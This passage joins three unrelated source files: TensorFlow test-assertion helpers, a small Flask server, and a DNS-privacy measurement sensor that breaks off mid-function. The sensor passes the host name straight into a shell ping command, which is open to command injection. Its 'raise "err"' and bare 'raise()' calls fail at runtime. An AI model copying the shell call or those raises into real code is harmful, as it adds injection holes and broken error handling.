if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections.Mapping)
if a_is_dict != isinstance(b, collections.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
if ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b):
return self._assertRaggedClose(a, b, rtol, atol, msg)
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
if (ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b)):
return self._assertRaggedEqual(a, b, msg)
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %s. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = {}".format(x))
msgs.append("not equal rhs = {}".format(y))
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate
lines. A line of ellipses (...) will be appended at the end if the number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" %
(str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
def _GetPyList(self, a):
"""Converts `a` to a nested python list."""
if isinstance(a, ragged_tensor.RaggedTensor):
return self.evaluate(a).to_list()
elif isinstance(a, ops.Tensor):
a = self.evaluate(a)
return a.tolist() if isinstance(a, np.ndarray) else a
elif isinstance(a, np.ndarray):
return a.tolist()
elif isinstance(a, ragged_tensor_value.RaggedTensorValue):
return a.to_list()
else:
return np.array(a).tolist()
def _assertRaggedEqual(self, a, b, msg):
"""Asserts that two ragged tensors are equal."""
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self.assertEqual(a_list, b_list, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertRaggedClose(self, a, b, rtol, atol, msg=None):
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self._assertListCloseRecursive(a_list, b_list, rtol, atol, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertListCloseRecursive(self, a, b, rtol, atol, msg, path="value"):
self.assertEqual(type(a), type(b))
if isinstance(a, (list, tuple)):
self.assertLen(a, len(b), "Length differs for %s" % path)
for i in range(len(a)):
self._assertListCloseRecursive(a[i], b[i], rtol, atol, msg,
"%s[%s]" % (path, i))
else:
self._assertAllCloseRecursive(a, b, rtol, atol, path, msg)
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = context.context().config
config.allow_soft_placement = allow_soft_placement
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = context.context().config
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
"PS" stands for "parameter server": a task responsible for storing and
updating the model's parameters. Other tasks send updates to these parameters
as they work on optimizing the parameters. This particular division of labor
between tasks is not required, but is common for distributed training.
Read more at https://www.tensorflow.org/guide/extend/architecture

Figure illustrates the interaction of these components.
"/job:worker/task:0" and "/job:ps/task:0" are both tasks with worker services.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.compat.v1.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.distribute.Server`.
worker_config: (optional) `tf.ConfigProto` to initialize workers. Can be
used to instantiate multiple devices etc.
ps_config: (optional) `tf.ConfigProto` to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.distribute.Server` (all running
locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
|
serve.py
|
import sys, json, threading, time, os
import flask
import config
app = flask.Flask(__name__)
port = int(sys.argv[1]) if len(sys.argv) == 2 else 80
class g:
daily_counts = []
def load_data():
while True:
with open(os.path.expanduser(config.config_dict['out_path'])) as f:
json_text = f.read()
g.daily_counts = json.loads('[' + json_text[:-2] + ']')
time.sleep(60 * 60 * 24)
t = threading.Thread(target=load_data)
t.daemon = True
t.start()
@app.route('/')
def index():
return flask.render_template('index.html')
@app.route('/daily_counts')
def daily_counts():
print 'daily_counts:', g.daily_counts[0]
return flask.jsonify(g.daily_counts)
@app.route('/voronoi_test')
def voroni_test():
return flask.render_template('voronoi_test.html')
if __name__ == '__main__':
app.run(host='0.0.0.0', port=port, debug=(port != 80))
|
sensor.py
|
import os
import requests
import dns.message
import dns.query
import dns.rdatatype
import random
from time import sleep
import peewee as pw
from datetime import datetime, timezone
import threading
import traceback
import json
global sec_working
sec_working = []
db = pw.SqliteDatabase('sensor.db', pragmas={
'journal_mode': 'wal',
'cache_size': -1024 * 64})
class BaseModel(pw.Model):
"""A base model that will use our MySQL database"""
class Meta:
database = db
class secdns_test(BaseModel):
date = pw.DateTimeField()
resolver = pw.CharField()
mode = pw.CharField()
result = pw.CharField()
sent = pw.CharField()
class test(BaseModel):
date = pw.DateTimeField()
host = pw.CharField()
sec_resolver = pw.CharField()
sec_resolved = pw.CharField()
norm_resolved = pw.CharField()
norm_google_resolved = pw.CharField()
sec_latency = pw.CharField()
norm_latency = pw.CharField()
sent = pw.CharField()
class sensor(BaseModel):
shash = pw.CharField()
def ip():
raw = requests.get("https://ipinfo.io")
raw = raw.json()
return (raw["ip"], raw["org"], raw['region'], raw['city'])
def ping(host):
response = os.popen("ping -c 5 " + host).read()
#print(response)
if 'time=' in response:
pingstatus = response.split("rtt min/avg/max/mdev = ")[1].split("/")[1]
else:
pingstatus = False
return pingstatus
def doh(host, provider="cloudflare"):
if provider == "cloudflare":
where = 'https://cloudflare-dns.com/dns-query'
elif provider == "google":
where = 'https://dns.google/dns-query'
elif provider == "quad9":
where = 'https://dns.quad9.net/dns-query'
else: raise()
qname = host
with requests.sessions.Session() as session:
q = dns.message.make_query(qname, dns.rdatatype.A)
r = dns.query.https(q, where, session=session, timeout=10.0)
if len(r.answer) == 0:
raise()
return r
def dot(host, provider="cloudflare"):
if provider == "cloudflare":
where = '1.1.1.1'
elif provider == "google":
where = '8.8.8.8'
elif provider == "quad9":
where = '9.9.9.9'
else: raise()
qname = host
q = dns.message.make_query(qname, dns.rdatatype.A)
r = dns.query.tls(q, where, timeout=10.0)
if len(r.answer) == 0:
raise()
return r
def normal_dns(host, provider="cloudflare", proto="udp"):
if provider == "cloudflare":
where = '1.1.1.1'
elif provider == "google":
where = '8.8.8.8'
elif provider == "quad9":
where = '9.9.9.9'
elif provider == "system":
where = '192.168.1.1'
else: raise()
qname = host
q = dns.message.make_query(qname, dns.rdatatype.A)
if proto == "udp":
r = dns.query.udp(q, where, timeout=10.0)
elif proto == "tcp":
r = dns.query.tcp(q, where, timeout=10.0)
if len(r.answer) == 0:
raise()
return r
def insert(result, mode):
if mode == "secdns_stat":
for r in result.keys():
secdns_test.create(
date = datetime.now(),
resolver = str(r).split('_')[0],
mode = str(r).split('_')[1],
result = str(result[str(r)]),
sent = '0'
)
elif mode == "test":
for r in result.keys():
test.create(
date = datetime.now(),
host = str(r),
sec_resolver = str(result[str(r)]['sec_resolver']),
sec_resolved = str(result[str(r)]['sec_dns']),
norm_resolved = str(result[str(r)]['norm_dns']),
norm_google_resolved = str(result[str(r)]['norm_google_dns']),
sec_latency = str(result[str(r)]['sec_latency']),
norm_latency = str(result[str(r)]['norm_latency']),
sent = '0'
)
else: raise()
def register():
server = "http://127.0.0.1:5000"
while True:
try:
ipp = ip()
shash = sensor.select()
query = "?ip=" + ipp[0] + "&asn=" + ipp[1] + "®ion=" + ipp[2] + "&city=" + ipp[3]
if len(shash) > 0:
shash = shash[0].shash
query += "&shash=" + shash
status = requests.get(server + "/api/v1/register" + query)
else:
status = requests.get(server + "/api/v1/register-new" + query)
sensor.create(shash=status.text)
except: traceback.print_exc()
sleep(random.uniform(3400,3800))
def report():
server = "http://127.0.0.1:5000"
while True:
sleep(random.uniform(300,500))
print("report")
try:
s = secdns_test.select().where(secdns_test.sent == '0')
if len(s) > 0:
pack = []
final = []
shash = sensor.select()[0].shash
for item in s:
obj = {}
obj['type'] = 'secdns'
obj['date'] = (item.date).timestamp()
obj['shash'] = shash
obj['resolver'] = item.resolver
obj['mode'] = item.mode
obj['result'] = item.result
final.append(obj)
pack.append(item.id)
status = requests.post(server + "/api/v1/submit", json=final)
if status.status_code == 201:
for i in pack:
secdns_test.update(sent='1').where(secdns_test.id == i).execute()
else:
raise "err"
s = test.select().where(test.sent == '0')
if len(s) > 0:
pack = []
final = []
shash = sensor.select()[0].shash
for item in s:
obj = {}
obj['type'] = 'host'
obj['date'] = (item.date).timestamp()
obj['shash'] = shash
obj['host'] = item.host
obj['sec_resolver'] = item.sec_resolver
obj['sec_resolved'] = item.sec_resolved
obj['norm_resolved'] = item.norm_resolved
obj['norm_google_resolved'] = item.norm_google_resolved
obj['sec_latency'] = item.sec_latency
obj['norm_latency'] = item.norm_latency
final.append(obj)
pack.append(item.id)
status = requests.post(server + "/api/v1/submit", json=final)
if status.status_code == 201:
for i in pack:
test.update(sent='1').where(test.id == i).execute()
else:
raise "err"
except: traceback.print_exc()
def do_dns(host, mode):
if mode == "cloudflare_doh":
return doh(host, 'cloudflare')
elif mode == "google_doh":
return doh(host, 'google')
elif mode == "quad9_doh":
return doh(host, 'quad9')
elif mode == "cloudflare_dot":
return dot(host, 'cloudflare')
elif mode == "google_dot":
return dot(host, 'google')
elif mode == "quad9_dot":
return dot(host, 'quad9')
else: raise()
def get_secdns_stat():
global sec_working
while (True):
result = {}
temp_working = []
rand = [random.uniform(1,5) for i in range(6)]
try:
doh("google.com", 'cloudflare')
result['cloudflare_doh'] = True
temp_working.append("cloudflare_doh")
except:
result['cloudflare_doh'] = False
sleep(rand[0])
try:
doh("google.com", 'google')
result['google_doh'] = True
temp_working.append("google_doh")
except:
result['google_doh'] = False
sleep(rand[1])
try:
doh("google.com", 'quad9')
result['quad9_doh'] = True
temp_working.append("quad9_doh")
except:
result['quad9_doh'] = False
sleep(rand[2])
try:
dot("google.com", 'cloudflare')
result['cloudflare_dot'] = True
temp_working.append("cloudflare_dot")
except:
result['cloudflare_dot'] = False
sleep(rand[3])
try:
dot("google.com", 'google')
result['google_dot'] = True
temp_working.append("google_dot")
except:
result['google_dot'] = False
sleep(rand[4])
try:
dot("google.com", 'quad9')
result['quad9_dot'] = True
temp_working.append("quad9_dot")
except:
result['quad9_dot'] = False
sec_working = temp_working
insert(result, "secdns_stat")
sleep(random.uniform(3600,4000))
def host_test(hosts):
global sec_working
while (True):
#print(sec_working)
result = {}
random.shuffle(hosts)
if len(sec_working) == 0:
sec = False
else: sec = sec_working[0]
for host in hosts:
try:
sec_dns = do_dns(host, sec).answer
sec_dns = [str(x).split(' ')[-1] for x in sec_dns]
sec_dns = ",".join(sec_dns)
except:
traceback.print_exc()
sec_dns = False
#print(sec_dns)
sleep(random.uniform(0.5,1.5))
try:
norm_dns = normal_dns(host, 'system').answer
norm_dns = [str(x).split(' ')[-1] for x in norm_dns]
norm_dns = ",".join(norm_dns)
except:
traceback.print_exc()
norm_dns = False
sleep(random.uniform(0.5,1.5))
try:
norm_google_dns = normal_dns(host, 'google').answer
norm_google_dns = [str(x).split(' ')[-1] for x in norm_google_dns]
